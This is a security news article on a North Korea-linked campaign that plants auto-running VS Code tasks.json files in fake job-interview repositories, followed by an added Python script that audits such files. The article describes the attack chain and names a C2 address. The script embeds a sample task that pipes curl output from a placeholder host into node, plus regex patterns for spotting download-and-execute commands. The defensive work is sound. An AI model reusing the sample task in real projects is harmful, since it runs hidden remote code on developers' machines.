Hackers Extensively Abuse Visual Studio Code to Execute Malicious Payloads on Victim Systems

Threat actors linked to North Korea have continued to expand their attack capabilities by weaponizing Microsoft Visual Studio Code, one of the world’s most popular code editors.

The Contagious Interview campaign has evolved significantly, shifting from traditional social engineering tactics to targeting developers through trusted development environments.

This new approach marks a concerning escalation in how adversaries exploit legitimate software tools to deliver sophisticated malware directly onto victim systems.

The attack chain begins when developers unknowingly clone malicious repositories, often disguised as recruitment assignments or technical job interviews.

The attack represents a shift in tactics beyond the previously documented ClickFix-based delivery methods. Rather than relying on suspicious email links, the attackers now embed malicious commands in Visual Studio Code configuration files shipped inside the repository itself.

Chain of events (Source - Jamf)

When a victim opens the cloned repository in Visual Studio Code and grants it workspace trust, a routine step in the normal workflow, the editor processes the repository's .vscode/tasks.json configuration file.

Any task in that file configured with "runOn": "folderOpen" is launched automatically once the folder is trusted, with no further prompt. A task of this kind can carry an arbitrary shell command, so the file effectively executes code on the system without the developer ever noticing.

Jamf analysts and researchers identified additional abuse of Visual Studio Code’s task configuration files in December, discovering dictionary files containing heavily obfuscated JavaScript code.

This JavaScript executes silently when a victim opens a malicious repository. The security researchers also documented how attackers introduced increasingly sophisticated obfuscation techniques to evade detection and analysis.

The Infection Mechanism and Execution Flow

The infection begins when a developer clones and opens a malicious Git repository hosted on GitHub or GitLab.

On macOS systems, the auto-run task launches a detached shell command: nohup bash invokes curl to fetch a JavaScript payload from Vercel-hosted infrastructure and hands the result to the Node.js runtime.

Because the payload runs in a separate Node.js process started with nohup, the attack continues even after Visual Studio Code is closed.

Visual Studio Code prompts the user to trust the repository author (Source - Jamf)

This detachment is what makes the technique effective: the payload is not tied to the editor's process lifetime, so closing the window does not stop it.

Once executed, the JavaScript payload establishes a persistent connection to a command-and-control server located at 87.236.177.93, beaconing every five seconds.

tasks.json (Source – Jamf)

The malware collects system information including hostname, MAC addresses, and operating system details, then sends this data to attackers for further tasking.

The payload maintains a persistent execution loop capable of accepting additional JavaScript instructions from the C2 server, enabling attackers to execute arbitrary commands and maintain long-term access.

Developers should review a repository's contents before marking it as trusted, keeping it in Restricted Mode until that review is done, and scrutinize .vscode/tasks.json for tasks configured with "runOn": "folderOpen" or for commands that fetch and execute remote content (for example, curl or wget piped into node or a shell). Either of these is a strong indicator of malicious intent.
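The following audit script is an added example, not code from the article or from Jamf: it automates the review described above and the auto-run behaviour described earlier. It parses a repository's .vscode/tasks.json (which is JSONC, so comments and trailing commas must be stripped before json.loads will accept it), then reports every task that either runs on folder open or whose command line matches the download-and-execute pattern the article describes. The embedded sample file is constructed for the example and modelled on that pattern; the URL in it is a placeholder, not the campaign's real infrastructure.

```python
import json
import re
import sys

# Constructed sample, modelled on the behaviour described in the article.
# Not the file Jamf analysed; the URL is a placeholder.
SAMPLE_TASKS_JSON = r'''{
    // Auto-generated build helpers
    "version": "2.0.0",
    "tasks": [
        {
            "label": "build",
            "type": "shell",
            "command": "npm run build",
        },
        {
            "label": "setup",
            "type": "shell",
            "command": "nohup bash -c \"curl -s https://example.invalid/p.js | node\" >/dev/null 2>&1 &",
            "runOptions": { "runOn": "folderOpen" },
            "presentation": { "reveal": "never" },
        },
    ],
}
'''

# Command-line traits worth flagging, each with a short human-readable reason.
SUSPICIOUS = [
    (r"\bcurl\b|\bwget\b", "downloads remote content"),
    (r"\bnohup\b|\bsetsid\b|&\s*$", "detaches from the editor process"),
    (r"\|\s*(node|bash|sh|zsh|python3?)\b", "pipes fetched data into an interpreter"),
    (r"\bnode\s+-e\b|\beval\b", "evaluates inline code"),
    (r"\bbase64\b", "decodes base64 (common obfuscation)"),
    (r">\s*/dev/null", "silences output"),
]


def strip_jsonc(text: str) -> str:
    """Turn JSONC into strict JSON: drop // and /* */ comments and trailing
    commas, while leaving string contents untouched."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:                      # pass 1: comments
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:
                out.append(text[i + 1]); i += 2; continue
            if c == '"':
                in_str = False
        elif c == '"':
            in_str = True; out.append(c)
        elif text.startswith("//", i):
            j = text.find("\n", i); i = n if j == -1 else j; continue
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2); i = n if j == -1 else j + 2; continue
        else:
            out.append(c)
        i += 1
    s, out, i, n, in_str = "".join(out), [], 0, len("".join(out)), False
    while i < n:                      # pass 2: trailing commas before } or ]
        c = s[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:
                out.append(s[i + 1]); i += 2; continue
            if c == '"':
                in_str = False
        elif c == '"':
            in_str = True; out.append(c)
        elif c == ",":
            j = i + 1
            while j < n and s[j] in " \t\r\n":
                j += 1
            if j < n and s[j] in "}]":
                i += 1; continue      # drop the comma, keep the whitespace
            out.append(c)
        else:
            out.append(c)
        i += 1
    return "".join(out)


def task_command_line(task: dict) -> str:
    """Flatten command + args, including per-OS overrides (osx/linux/windows)."""
    parts = [str(task.get("command", ""))] + [str(a) for a in task.get("args", [])]
    for os_key in ("osx", "linux", "windows"):
        sub = task.get(os_key)
        if isinstance(sub, dict):
            parts.append(str(sub.get("command", "")))
            parts += [str(a) for a in sub.get("args", [])]
    return " ".join(p for p in parts if p)


def audit_tasks_json(text: str) -> list:
    """Return one finding per task that auto-runs or looks like download-and-execute."""
    findings = []
    for task in json.loads(strip_jsonc(text)).get("tasks", []):
        auto_run = (task.get("runOptions") or {}).get("runOn") == "folderOpen"
        hidden = (task.get("presentation") or {}).get("reveal") == "never"
        cmd = task_command_line(task)
        reasons = [why for pat, why in SUSPICIOUS if re.search(pat, cmd)]
        if auto_run or reasons:
            findings.append({"label": task.get("label"), "auto_run": auto_run,
                             "hidden": hidden, "reasons": reasons, "command": cmd,
                             "severity": "high" if auto_run and reasons else "medium"})
    return findings


if __name__ == "__main__":
    # Usage: python audit_tasks.py [path/to/.vscode/tasks.json]; defaults to the sample.
    src = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_TASKS_JSON
    for f in audit_tasks_json(src):
        print(f"[{f['severity']}] task '{f['label']}' auto_run={f['auto_run']} "
              f"hidden={f['hidden']}: {', '.join(f['reasons']) or 'auto-run only'}")
```

A task that only auto-runs (for example a harmless watcher) is reported at medium severity so it still gets a look; the combination of folder-open execution, a hidden terminal, and a curl-into-node command line is the shape of the chain the article describes and is reported as high.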
